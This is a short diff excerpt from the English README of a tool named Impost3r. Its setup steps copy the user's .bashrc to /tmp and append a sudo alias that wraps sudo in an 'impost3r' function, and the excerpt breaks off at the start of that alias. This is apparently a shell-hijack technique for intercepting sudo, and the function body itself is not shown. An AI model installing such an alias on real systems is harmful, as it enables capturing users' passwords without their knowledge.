ph4ntonn/Impost3r/README_EN.md

 - Then copy the original .bashrc file ```cp ～/.bashrc /tmp/```,and put this copy anywhere you like(In this case,i will use /tmp/)

-- Edit the original .bashrc,and add following sentences at the end of file:
+- Edit the original .bashrc,and add following sentences at the end of file(The param "/tmp/.impost3r" must be as the same as the following FILENAME you specified):

 ```
 alias sudo='impost3r() {